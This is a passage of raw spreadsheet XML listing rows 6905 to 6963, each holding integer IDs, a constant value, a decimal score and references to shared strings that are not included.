      <c r="A6905" s="1">
        <v>6903</v>
      </c>
      <c r="B6905">
        <v>902</v>
      </c>
      <c r="C6905">
        <v>902</v>
      </c>
      <c r="D6905">
        <v>4</v>
      </c>
      <c r="E6905">
        <v>0.98210000991821289</v>
      </c>
      <c r="F6905" t="s">
        <v>13461</v>
      </c>
      <c r="G6905" t="s">
        <v>13657</v>
      </c>
      <c r="H6905" t="s">
        <v>13658</v>
      </c>
    </row>
    <row r="6906" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6906" s="1">
        <v>6904</v>
      </c>
      <c r="B6906">
        <v>901</v>
      </c>
      <c r="C6906">
        <v>901</v>
      </c>
      <c r="D6906">
        <v>4</v>
      </c>
      <c r="E6906">
        <v>0.52890002727508545</v>
      </c>
      <c r="F6906" t="s">
        <v>13461</v>
      </c>
      <c r="G6906" t="s">
        <v>13659</v>
      </c>
      <c r="H6906" t="s">
        <v>13660</v>
      </c>
    </row>
    <row r="6907" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6907" s="1">
        <v>6905</v>
      </c>
      <c r="B6907">
        <v>897</v>
      </c>
      <c r="C6907">
        <v>897</v>
      </c>
      <c r="D6907">
        <v>4</v>
      </c>
      <c r="E6907">
        <v>0.52890002727508545</v>
      </c>
      <c r="F6907" t="s">
        <v>13461</v>
      </c>
      <c r="G6907" t="s">
        <v>13661</v>
      </c>
      <c r="H6907" t="s">
        <v>13662</v>
      </c>
    </row>
    <row r="6908" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6908" s="1">
        <v>6906</v>
      </c>
      <c r="B6908">
        <v>894</v>
      </c>
      <c r="C6908">
        <v>894</v>
      </c>
      <c r="D6908">
        <v>4</v>
      </c>
      <c r="E6908">
        <v>0.71969997882843018</v>
      </c>
      <c r="F6908" t="s">
        <v>13461</v>
      </c>
      <c r="G6908" t="s">
        <v>13663</v>
      </c>
      <c r="H6908" t="s">
        <v>13664</v>
      </c>
    </row>
    <row r="6909" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6909" s="1">
        <v>6907</v>
      </c>
      <c r="B6909">
        <v>477</v>
      </c>
      <c r="C6909">
        <v>477</v>
      </c>
      <c r="D6909">
        <v>4</v>
      </c>
      <c r="E6909">
        <v>0.50260001420974731</v>
      </c>
      <c r="F6909" t="s">
        <v>13461</v>
      </c>
      <c r="G6909" t="s">
        <v>13665</v>
      </c>
      <c r="H6909" t="s">
        <v>13666</v>
      </c>
    </row>
    <row r="6910" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6910" s="1">
        <v>6908</v>
      </c>
      <c r="B6910">
        <v>892</v>
      </c>
      <c r="C6910">
        <v>892</v>
      </c>
      <c r="D6910">
        <v>4</v>
      </c>
      <c r="E6910">
        <v>0.65369999408721924</v>
      </c>
      <c r="F6910" t="s">
        <v>13461</v>
      </c>
      <c r="G6910" t="s">
        <v>13667</v>
      </c>
      <c r="H6910" t="s">
        <v>13668</v>
      </c>
    </row>
    <row r="6911" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6911" s="1">
        <v>6909</v>
      </c>
      <c r="B6911">
        <v>478</v>
      </c>
      <c r="C6911">
        <v>478</v>
      </c>
      <c r="D6911">
        <v>4</v>
      </c>
      <c r="E6911">
        <v>0.96210002899169922</v>
      </c>
      <c r="F6911" t="s">
        <v>13461</v>
      </c>
      <c r="G6911" t="s">
        <v>13669</v>
      </c>
      <c r="H6911" t="s">
        <v>13670</v>
      </c>
    </row>
    <row r="6912" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6912" s="1">
        <v>6910</v>
      </c>
      <c r="B6912">
        <v>481</v>
      </c>
      <c r="C6912">
        <v>481</v>
      </c>
      <c r="D6912">
        <v>4</v>
      </c>
      <c r="E6912">
        <v>0.40939998626708979</v>
      </c>
      <c r="F6912" t="s">
        <v>13461</v>
      </c>
      <c r="G6912" t="s">
        <v>13671</v>
      </c>
      <c r="H6912" t="s">
        <v>13672</v>
      </c>
    </row>
    <row r="6913" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6913" s="1">
        <v>6911</v>
      </c>
      <c r="B6913">
        <v>7712</v>
      </c>
      <c r="C6913">
        <v>7712</v>
      </c>
      <c r="D6913">
        <v>4</v>
      </c>
      <c r="E6913">
        <v>0.94520002603530884</v>
      </c>
      <c r="F6913" t="s">
        <v>13461</v>
      </c>
      <c r="G6913" t="s">
        <v>13673</v>
      </c>
      <c r="H6913" t="s">
        <v>13674</v>
      </c>
    </row>
    <row r="6914" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6914" s="1">
        <v>6912</v>
      </c>
      <c r="B6914">
        <v>7711</v>
      </c>
      <c r="C6914">
        <v>7711</v>
      </c>
      <c r="D6914">
        <v>4</v>
      </c>
      <c r="E6914">
        <v>0.99870002269744873</v>
      </c>
      <c r="F6914" t="s">
        <v>13461</v>
      </c>
      <c r="G6914" t="s">
        <v>13675</v>
      </c>
      <c r="H6914" t="s">
        <v>13676</v>
      </c>
    </row>
    <row r="6915" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6915" s="1">
        <v>6913</v>
      </c>
      <c r="B6915">
        <v>7710</v>
      </c>
      <c r="C6915">
        <v>7710</v>
      </c>
      <c r="D6915">
        <v>4</v>
      </c>
      <c r="E6915">
        <v>0.97430002689361572</v>
      </c>
      <c r="F6915" t="s">
        <v>13461</v>
      </c>
      <c r="G6915" t="s">
        <v>13677</v>
      </c>
      <c r="H6915" t="s">
        <v>13678</v>
      </c>
    </row>
    <row r="6916" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6916" s="1">
        <v>6914</v>
      </c>
      <c r="B6916">
        <v>887</v>
      </c>
      <c r="C6916">
        <v>887</v>
      </c>
      <c r="D6916">
        <v>4</v>
      </c>
      <c r="E6916">
        <v>0.39169999957084661</v>
      </c>
      <c r="F6916" t="s">
        <v>13461</v>
      </c>
      <c r="G6916" t="s">
        <v>13679</v>
      </c>
      <c r="H6916" t="s">
        <v>13680</v>
      </c>
    </row>
    <row r="6917" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6917" s="1">
        <v>6915</v>
      </c>
      <c r="B6917">
        <v>905</v>
      </c>
      <c r="C6917">
        <v>905</v>
      </c>
      <c r="D6917">
        <v>4</v>
      </c>
      <c r="E6917">
        <v>0.69290000200271606</v>
      </c>
      <c r="F6917" t="s">
        <v>13461</v>
      </c>
      <c r="G6917" t="s">
        <v>13681</v>
      </c>
      <c r="H6917" t="s">
        <v>13682</v>
      </c>
    </row>
    <row r="6918" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6918" s="1">
        <v>6916</v>
      </c>
      <c r="B6918">
        <v>484</v>
      </c>
      <c r="C6918">
        <v>484</v>
      </c>
      <c r="D6918">
        <v>4</v>
      </c>
      <c r="E6918">
        <v>0.69630002975463867</v>
      </c>
      <c r="F6918" t="s">
        <v>13461</v>
      </c>
      <c r="G6918" t="s">
        <v>13683</v>
      </c>
      <c r="H6918" t="s">
        <v>13684</v>
      </c>
    </row>
    <row r="6919" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6919" s="1">
        <v>6917</v>
      </c>
      <c r="B6919">
        <v>886</v>
      </c>
      <c r="C6919">
        <v>886</v>
      </c>
      <c r="D6919">
        <v>4</v>
      </c>
      <c r="E6919">
        <v>0.78100001811981201</v>
      </c>
      <c r="F6919" t="s">
        <v>13461</v>
      </c>
      <c r="G6919" t="s">
        <v>13685</v>
      </c>
      <c r="H6919" t="s">
        <v>13686</v>
      </c>
    </row>
    <row r="6920" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6920" s="1">
        <v>6918</v>
      </c>
      <c r="B6920">
        <v>885</v>
      </c>
      <c r="C6920">
        <v>885</v>
      </c>
      <c r="D6920">
        <v>4</v>
      </c>
      <c r="E6920">
        <v>0.92100000381469727</v>
      </c>
      <c r="F6920" t="s">
        <v>13461</v>
      </c>
      <c r="G6920" t="s">
        <v>13687</v>
      </c>
      <c r="H6920" t="s">
        <v>13688</v>
      </c>
    </row>
    <row r="6921" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6921" s="1">
        <v>6919</v>
      </c>
      <c r="B6921">
        <v>486</v>
      </c>
      <c r="C6921">
        <v>486</v>
      </c>
      <c r="D6921">
        <v>4</v>
      </c>
      <c r="E6921">
        <v>0.63580000400543213</v>
      </c>
      <c r="F6921" t="s">
        <v>13461</v>
      </c>
      <c r="G6921" t="s">
        <v>13689</v>
      </c>
      <c r="H6921" t="s">
        <v>13690</v>
      </c>
    </row>
    <row r="6922" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6922" s="1">
        <v>6920</v>
      </c>
      <c r="B6922">
        <v>883</v>
      </c>
      <c r="C6922">
        <v>883</v>
      </c>
      <c r="D6922">
        <v>4</v>
      </c>
      <c r="E6922">
        <v>0.57800000905990601</v>
      </c>
      <c r="F6922" t="s">
        <v>13461</v>
      </c>
      <c r="G6922" t="s">
        <v>13691</v>
      </c>
      <c r="H6922" t="s">
        <v>13692</v>
      </c>
    </row>
    <row r="6923" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6923" s="1">
        <v>6921</v>
      </c>
      <c r="B6923">
        <v>487</v>
      </c>
      <c r="C6923">
        <v>487</v>
      </c>
      <c r="D6923">
        <v>4</v>
      </c>
      <c r="E6923">
        <v>0.62379997968673706</v>
      </c>
      <c r="F6923" t="s">
        <v>13461</v>
      </c>
      <c r="G6923" t="s">
        <v>13693</v>
      </c>
      <c r="H6923" t="s">
        <v>13694</v>
      </c>
    </row>
    <row r="6924" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6924" s="1">
        <v>6922</v>
      </c>
      <c r="B6924">
        <v>875</v>
      </c>
      <c r="C6924">
        <v>875</v>
      </c>
      <c r="D6924">
        <v>4</v>
      </c>
      <c r="E6924">
        <v>0.79759997129440308</v>
      </c>
      <c r="F6924" t="s">
        <v>13461</v>
      </c>
      <c r="G6924" t="s">
        <v>13695</v>
      </c>
      <c r="H6924" t="s">
        <v>13696</v>
      </c>
    </row>
    <row r="6925" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6925" s="1">
        <v>6923</v>
      </c>
      <c r="B6925">
        <v>873</v>
      </c>
      <c r="C6925">
        <v>873</v>
      </c>
      <c r="D6925">
        <v>4</v>
      </c>
      <c r="E6925">
        <v>0.68529999256134033</v>
      </c>
      <c r="F6925" t="s">
        <v>13461</v>
      </c>
      <c r="G6925" t="s">
        <v>13697</v>
      </c>
      <c r="H6925" t="s">
        <v>13698</v>
      </c>
    </row>
    <row r="6926" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6926" s="1">
        <v>6924</v>
      </c>
      <c r="B6926">
        <v>867</v>
      </c>
      <c r="C6926">
        <v>867</v>
      </c>
      <c r="D6926">
        <v>4</v>
      </c>
      <c r="E6926">
        <v>0.55330002307891846</v>
      </c>
      <c r="F6926" t="s">
        <v>13461</v>
      </c>
      <c r="G6926" t="s">
        <v>13699</v>
      </c>
      <c r="H6926" t="s">
        <v>13700</v>
      </c>
    </row>
    <row r="6927" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6927" s="1">
        <v>6925</v>
      </c>
      <c r="B6927">
        <v>866</v>
      </c>
      <c r="C6927">
        <v>866</v>
      </c>
      <c r="D6927">
        <v>4</v>
      </c>
      <c r="E6927">
        <v>0.4578000009059906</v>
      </c>
      <c r="F6927" t="s">
        <v>13461</v>
      </c>
      <c r="G6927" t="s">
        <v>13701</v>
      </c>
      <c r="H6927" t="s">
        <v>13702</v>
      </c>
    </row>
    <row r="6928" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6928" s="1">
        <v>6926</v>
      </c>
      <c r="B6928">
        <v>862</v>
      </c>
      <c r="C6928">
        <v>862</v>
      </c>
      <c r="D6928">
        <v>4</v>
      </c>
      <c r="E6928">
        <v>0.51190000772476196</v>
      </c>
      <c r="F6928" t="s">
        <v>13461</v>
      </c>
      <c r="G6928" t="s">
        <v>13703</v>
      </c>
      <c r="H6928" t="s">
        <v>13704</v>
      </c>
    </row>
    <row r="6929" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6929" s="1">
        <v>6927</v>
      </c>
      <c r="B6929">
        <v>857</v>
      </c>
      <c r="C6929">
        <v>857</v>
      </c>
      <c r="D6929">
        <v>4</v>
      </c>
      <c r="E6929">
        <v>0.99099999666213989</v>
      </c>
      <c r="F6929" t="s">
        <v>13461</v>
      </c>
      <c r="G6929" t="s">
        <v>13705</v>
      </c>
      <c r="H6929" t="s">
        <v>13706</v>
      </c>
    </row>
    <row r="6930" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6930" s="1">
        <v>6928</v>
      </c>
      <c r="B6930">
        <v>831</v>
      </c>
      <c r="C6930">
        <v>831</v>
      </c>
      <c r="D6930">
        <v>4</v>
      </c>
      <c r="E6930">
        <v>0.52240002155303955</v>
      </c>
      <c r="F6930" t="s">
        <v>13461</v>
      </c>
      <c r="G6930" t="s">
        <v>13707</v>
      </c>
      <c r="H6930" t="s">
        <v>13708</v>
      </c>
    </row>
    <row r="6931" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6931" s="1">
        <v>6929</v>
      </c>
      <c r="B6931">
        <v>830</v>
      </c>
      <c r="C6931">
        <v>830</v>
      </c>
      <c r="D6931">
        <v>4</v>
      </c>
      <c r="E6931">
        <v>0.6315000057220459</v>
      </c>
      <c r="F6931" t="s">
        <v>13461</v>
      </c>
      <c r="G6931" t="s">
        <v>13709</v>
      </c>
      <c r="H6931" t="s">
        <v>13710</v>
      </c>
    </row>
    <row r="6932" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6932" s="1">
        <v>6930</v>
      </c>
      <c r="B6932">
        <v>485</v>
      </c>
      <c r="C6932">
        <v>485</v>
      </c>
      <c r="D6932">
        <v>4</v>
      </c>
      <c r="E6932">
        <v>0.5909000039100647</v>
      </c>
      <c r="F6932" t="s">
        <v>13461</v>
      </c>
      <c r="G6932" t="s">
        <v>13711</v>
      </c>
      <c r="H6932" t="s">
        <v>13712</v>
      </c>
    </row>
    <row r="6933" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6933" s="1">
        <v>6931</v>
      </c>
      <c r="B6933">
        <v>7501</v>
      </c>
      <c r="C6933">
        <v>7501</v>
      </c>
      <c r="D6933">
        <v>4</v>
      </c>
      <c r="E6933">
        <v>0.9528999924659729</v>
      </c>
      <c r="F6933" t="s">
        <v>13461</v>
      </c>
      <c r="G6933" t="s">
        <v>13713</v>
      </c>
      <c r="H6933" t="s">
        <v>13714</v>
      </c>
    </row>
    <row r="6934" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6934" s="1">
        <v>6932</v>
      </c>
      <c r="B6934">
        <v>913</v>
      </c>
      <c r="C6934">
        <v>913</v>
      </c>
      <c r="D6934">
        <v>4</v>
      </c>
      <c r="E6934">
        <v>0.54909998178482056</v>
      </c>
      <c r="F6934" t="s">
        <v>13461</v>
      </c>
      <c r="G6934" t="s">
        <v>13715</v>
      </c>
      <c r="H6934" t="s">
        <v>13716</v>
      </c>
    </row>
    <row r="6935" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6935" s="1">
        <v>6933</v>
      </c>
      <c r="B6935">
        <v>7499</v>
      </c>
      <c r="C6935">
        <v>7499</v>
      </c>
      <c r="D6935">
        <v>4</v>
      </c>
      <c r="E6935">
        <v>0.68919998407363892</v>
      </c>
      <c r="F6935" t="s">
        <v>13461</v>
      </c>
      <c r="G6935" t="s">
        <v>13717</v>
      </c>
      <c r="H6935" t="s">
        <v>13718</v>
      </c>
    </row>
    <row r="6936" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6936" s="1">
        <v>6934</v>
      </c>
      <c r="B6936">
        <v>404</v>
      </c>
      <c r="C6936">
        <v>404</v>
      </c>
      <c r="D6936">
        <v>4</v>
      </c>
      <c r="E6936">
        <v>0.63139998912811279</v>
      </c>
      <c r="F6936" t="s">
        <v>13461</v>
      </c>
      <c r="G6936" t="s">
        <v>13719</v>
      </c>
      <c r="H6936" t="s">
        <v>13720</v>
      </c>
    </row>
    <row r="6937" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6937" s="1">
        <v>6935</v>
      </c>
      <c r="B6937">
        <v>993</v>
      </c>
      <c r="C6937">
        <v>993</v>
      </c>
      <c r="D6937">
        <v>4</v>
      </c>
      <c r="E6937">
        <v>0.40590000152587891</v>
      </c>
      <c r="F6937" t="s">
        <v>13461</v>
      </c>
      <c r="G6937" t="s">
        <v>13721</v>
      </c>
      <c r="H6937" t="s">
        <v>13722</v>
      </c>
    </row>
    <row r="6938" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6938" s="1">
        <v>6936</v>
      </c>
      <c r="B6938">
        <v>7464</v>
      </c>
      <c r="C6938">
        <v>7464</v>
      </c>
      <c r="D6938">
        <v>4</v>
      </c>
      <c r="E6938">
        <v>0.73059999942779541</v>
      </c>
      <c r="F6938" t="s">
        <v>13461</v>
      </c>
      <c r="G6938" t="s">
        <v>13723</v>
      </c>
      <c r="H6938" t="s">
        <v>13724</v>
      </c>
    </row>
    <row r="6939" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6939" s="1">
        <v>6937</v>
      </c>
      <c r="B6939">
        <v>7466</v>
      </c>
      <c r="C6939">
        <v>7466</v>
      </c>
      <c r="D6939">
        <v>4</v>
      </c>
      <c r="E6939">
        <v>0.92669999599456787</v>
      </c>
      <c r="F6939" t="s">
        <v>13461</v>
      </c>
      <c r="G6939" t="s">
        <v>13725</v>
      </c>
      <c r="H6939" t="s">
        <v>13726</v>
      </c>
    </row>
    <row r="6940" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6940" s="1">
        <v>6938</v>
      </c>
      <c r="B6940">
        <v>411</v>
      </c>
      <c r="C6940">
        <v>411</v>
      </c>
      <c r="D6940">
        <v>4</v>
      </c>
      <c r="E6940">
        <v>0.8245999813079834</v>
      </c>
      <c r="F6940" t="s">
        <v>13461</v>
      </c>
      <c r="G6940" t="s">
        <v>13727</v>
      </c>
      <c r="H6940" t="s">
        <v>13728</v>
      </c>
    </row>
    <row r="6941" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6941" s="1">
        <v>6939</v>
      </c>
      <c r="B6941">
        <v>985</v>
      </c>
      <c r="C6941">
        <v>985</v>
      </c>
      <c r="D6941">
        <v>4</v>
      </c>
      <c r="E6941">
        <v>0.56739997863769531</v>
      </c>
      <c r="F6941" t="s">
        <v>13461</v>
      </c>
      <c r="G6941" t="s">
        <v>13729</v>
      </c>
      <c r="H6941" t="s">
        <v>13730</v>
      </c>
    </row>
    <row r="6942" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6942" s="1">
        <v>6940</v>
      </c>
      <c r="B6942">
        <v>422</v>
      </c>
      <c r="C6942">
        <v>422</v>
      </c>
      <c r="D6942">
        <v>4</v>
      </c>
      <c r="E6942">
        <v>0.76319998502731323</v>
      </c>
      <c r="F6942" t="s">
        <v>13461</v>
      </c>
      <c r="G6942" t="s">
        <v>13731</v>
      </c>
      <c r="H6942" t="s">
        <v>13732</v>
      </c>
    </row>
    <row r="6943" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6943" s="1">
        <v>6941</v>
      </c>
      <c r="B6943">
        <v>7470</v>
      </c>
      <c r="C6943">
        <v>7470</v>
      </c>
      <c r="D6943">
        <v>4</v>
      </c>
      <c r="E6943">
        <v>0.99959999322891235</v>
      </c>
      <c r="F6943" t="s">
        <v>13461</v>
      </c>
      <c r="G6943" t="s">
        <v>13733</v>
      </c>
      <c r="H6943" t="s">
        <v>13734</v>
      </c>
    </row>
    <row r="6944" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6944" s="1">
        <v>6942</v>
      </c>
      <c r="B6944">
        <v>981</v>
      </c>
      <c r="C6944">
        <v>981</v>
      </c>
      <c r="D6944">
        <v>4</v>
      </c>
      <c r="E6944">
        <v>0.75830000638961792</v>
      </c>
      <c r="F6944" t="s">
        <v>13461</v>
      </c>
      <c r="G6944" t="s">
        <v>13735</v>
      </c>
      <c r="H6944" t="s">
        <v>13736</v>
      </c>
    </row>
    <row r="6945" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6945" s="1">
        <v>6943</v>
      </c>
      <c r="B6945">
        <v>978</v>
      </c>
      <c r="C6945">
        <v>978</v>
      </c>
      <c r="D6945">
        <v>4</v>
      </c>
      <c r="E6945">
        <v>0.64550000429153442</v>
      </c>
      <c r="F6945" t="s">
        <v>13461</v>
      </c>
      <c r="G6945" t="s">
        <v>13737</v>
      </c>
      <c r="H6945" t="s">
        <v>13738</v>
      </c>
    </row>
    <row r="6946" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6946" s="1">
        <v>6944</v>
      </c>
      <c r="B6946">
        <v>428</v>
      </c>
      <c r="C6946">
        <v>428</v>
      </c>
      <c r="D6946">
        <v>4</v>
      </c>
      <c r="E6946">
        <v>0.56660002470016479</v>
      </c>
      <c r="F6946" t="s">
        <v>13461</v>
      </c>
      <c r="G6946" t="s">
        <v>13739</v>
      </c>
      <c r="H6946" t="s">
        <v>13740</v>
      </c>
    </row>
    <row r="6947" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6947" s="1">
        <v>6945</v>
      </c>
      <c r="B6947">
        <v>434</v>
      </c>
      <c r="C6947">
        <v>434</v>
      </c>
      <c r="D6947">
        <v>4</v>
      </c>
      <c r="E6947">
        <v>0.56550002098083496</v>
      </c>
      <c r="F6947" t="s">
        <v>13461</v>
      </c>
      <c r="G6947" t="s">
        <v>13741</v>
      </c>
      <c r="H6947" t="s">
        <v>13742</v>
      </c>
    </row>
    <row r="6948" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6948" s="1">
        <v>6946</v>
      </c>
      <c r="B6948">
        <v>435</v>
      </c>
      <c r="C6948">
        <v>435</v>
      </c>
      <c r="D6948">
        <v>4</v>
      </c>
      <c r="E6948">
        <v>0.80879998207092285</v>
      </c>
      <c r="F6948" t="s">
        <v>13461</v>
      </c>
      <c r="G6948" t="s">
        <v>13743</v>
      </c>
      <c r="H6948" t="s">
        <v>13744</v>
      </c>
    </row>
    <row r="6949" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6949" s="1">
        <v>6947</v>
      </c>
      <c r="B6949">
        <v>967</v>
      </c>
      <c r="C6949">
        <v>967</v>
      </c>
      <c r="D6949">
        <v>4</v>
      </c>
      <c r="E6949">
        <v>0.99860000610351563</v>
      </c>
      <c r="F6949" t="s">
        <v>13461</v>
      </c>
      <c r="G6949" t="s">
        <v>13745</v>
      </c>
      <c r="H6949" t="s">
        <v>13746</v>
      </c>
    </row>
    <row r="6950" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6950" s="1">
        <v>6948</v>
      </c>
      <c r="B6950">
        <v>449</v>
      </c>
      <c r="C6950">
        <v>449</v>
      </c>
      <c r="D6950">
        <v>4</v>
      </c>
      <c r="E6950">
        <v>0.41909998655319208</v>
      </c>
      <c r="F6950" t="s">
        <v>13461</v>
      </c>
      <c r="G6950" t="s">
        <v>13747</v>
      </c>
      <c r="H6950" t="s">
        <v>13748</v>
      </c>
    </row>
    <row r="6951" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6951" s="1">
        <v>6949</v>
      </c>
      <c r="B6951">
        <v>454</v>
      </c>
      <c r="C6951">
        <v>454</v>
      </c>
      <c r="D6951">
        <v>4</v>
      </c>
      <c r="E6951">
        <v>0.82010000944137573</v>
      </c>
      <c r="F6951" t="s">
        <v>13461</v>
      </c>
      <c r="G6951" t="s">
        <v>13749</v>
      </c>
      <c r="H6951" t="s">
        <v>13750</v>
      </c>
    </row>
    <row r="6952" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6952" s="1">
        <v>6950</v>
      </c>
      <c r="B6952">
        <v>960</v>
      </c>
      <c r="C6952">
        <v>960</v>
      </c>
      <c r="D6952">
        <v>4</v>
      </c>
      <c r="E6952">
        <v>0.85750001668930054</v>
      </c>
      <c r="F6952" t="s">
        <v>13461</v>
      </c>
      <c r="G6952" t="s">
        <v>13751</v>
      </c>
      <c r="H6952" t="s">
        <v>13752</v>
      </c>
    </row>
    <row r="6953" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6953" s="1">
        <v>6951</v>
      </c>
      <c r="B6953">
        <v>461</v>
      </c>
      <c r="C6953">
        <v>461</v>
      </c>
      <c r="D6953">
        <v>4</v>
      </c>
      <c r="E6953">
        <v>0.56849998235702515</v>
      </c>
      <c r="F6953" t="s">
        <v>13461</v>
      </c>
      <c r="G6953" t="s">
        <v>13753</v>
      </c>
      <c r="H6953" t="s">
        <v>13754</v>
      </c>
    </row>
    <row r="6954" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6954" s="1">
        <v>6952</v>
      </c>
      <c r="B6954">
        <v>7485</v>
      </c>
      <c r="C6954">
        <v>7485</v>
      </c>
      <c r="D6954">
        <v>4</v>
      </c>
      <c r="E6954">
        <v>0.99690002202987671</v>
      </c>
      <c r="F6954" t="s">
        <v>13461</v>
      </c>
      <c r="G6954" t="s">
        <v>13755</v>
      </c>
      <c r="H6954" t="s">
        <v>13756</v>
      </c>
    </row>
    <row r="6955" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6955" s="1">
        <v>6953</v>
      </c>
      <c r="B6955">
        <v>464</v>
      </c>
      <c r="C6955">
        <v>464</v>
      </c>
      <c r="D6955">
        <v>4</v>
      </c>
      <c r="E6955">
        <v>0.56919997930526733</v>
      </c>
      <c r="F6955" t="s">
        <v>13461</v>
      </c>
      <c r="G6955" t="s">
        <v>13757</v>
      </c>
      <c r="H6955" t="s">
        <v>13758</v>
      </c>
    </row>
    <row r="6956" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6956" s="1">
        <v>6954</v>
      </c>
      <c r="B6956">
        <v>466</v>
      </c>
      <c r="C6956">
        <v>466</v>
      </c>
      <c r="D6956">
        <v>4</v>
      </c>
      <c r="E6956">
        <v>0.9968000054359436</v>
      </c>
      <c r="F6956" t="s">
        <v>13461</v>
      </c>
      <c r="G6956" t="s">
        <v>13759</v>
      </c>
      <c r="H6956" t="s">
        <v>13760</v>
      </c>
    </row>
    <row r="6957" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6957" s="1">
        <v>6955</v>
      </c>
      <c r="B6957">
        <v>7487</v>
      </c>
      <c r="C6957">
        <v>7487</v>
      </c>
      <c r="D6957">
        <v>4</v>
      </c>
      <c r="E6957">
        <v>0.72469997406005859</v>
      </c>
      <c r="F6957" t="s">
        <v>13461</v>
      </c>
      <c r="G6957" t="s">
        <v>13761</v>
      </c>
      <c r="H6957" t="s">
        <v>13762</v>
      </c>
    </row>
    <row r="6958" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6958" s="1">
        <v>6956</v>
      </c>
      <c r="B6958">
        <v>7489</v>
      </c>
      <c r="C6958">
        <v>7489</v>
      </c>
      <c r="D6958">
        <v>4</v>
      </c>
      <c r="E6958">
        <v>0.52710002660751343</v>
      </c>
      <c r="F6958" t="s">
        <v>13461</v>
      </c>
      <c r="G6958" t="s">
        <v>13763</v>
      </c>
      <c r="H6958" t="s">
        <v>13764</v>
      </c>
    </row>
    <row r="6959" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6959" s="1">
        <v>6957</v>
      </c>
      <c r="B6959">
        <v>947</v>
      </c>
      <c r="C6959">
        <v>947</v>
      </c>
      <c r="D6959">
        <v>4</v>
      </c>
      <c r="E6959">
        <v>0.31889998912811279</v>
      </c>
      <c r="F6959" t="s">
        <v>13461</v>
      </c>
      <c r="G6959" t="s">
        <v>13765</v>
      </c>
      <c r="H6959" t="s">
        <v>13766</v>
      </c>
    </row>
    <row r="6960" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6960" s="1">
        <v>6958</v>
      </c>
      <c r="B6960">
        <v>943</v>
      </c>
      <c r="C6960">
        <v>943</v>
      </c>
      <c r="D6960">
        <v>4</v>
      </c>
      <c r="E6960">
        <v>0.66079998016357422</v>
      </c>
      <c r="F6960" t="s">
        <v>13461</v>
      </c>
      <c r="G6960" t="s">
        <v>13767</v>
      </c>
      <c r="H6960" t="s">
        <v>13768</v>
      </c>
    </row>
    <row r="6961" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6961" s="1">
        <v>6959</v>
      </c>
      <c r="B6961">
        <v>472</v>
      </c>
      <c r="C6961">
        <v>472</v>
      </c>
      <c r="D6961">
        <v>4</v>
      </c>
      <c r="E6961">
        <v>0.99779999256134033</v>
      </c>
      <c r="F6961" t="s">
        <v>13461</v>
      </c>
      <c r="G6961" t="s">
        <v>13769</v>
      </c>
      <c r="H6961" t="s">
        <v>13770</v>
      </c>
    </row>
    <row r="6962" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6962" s="1">
        <v>6960</v>
      </c>
      <c r="B6962">
        <v>932</v>
      </c>
      <c r="C6962">
        <v>932</v>
      </c>
      <c r="D6962">
        <v>4</v>
      </c>
      <c r="E6962">
        <v>0.45339998602867132</v>
      </c>
      <c r="F6962" t="s">
        <v>13461</v>
      </c>
      <c r="G6962" t="s">
        <v>13771</v>
      </c>
      <c r="H6962" t="s">
        <v>13772</v>
      </c>
    </row>
    <row r="6963" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6963" s="1">
        <v>6961</v>
      </c>
      <c r="B6963">
        <v>930</v>
      </c>
      <c r="C6963">
        <v>930</v>
      </c>
      <c r="D6963">
        <v>4</v>
      </c>
      <c r="E6963">
        <v>0.9562000036239624</v>
      </c>
      <c r="F6963" t="s">
        <v>13461</v>
      </c>
      <c r="G6963" t="s">
        <v>13773</v>
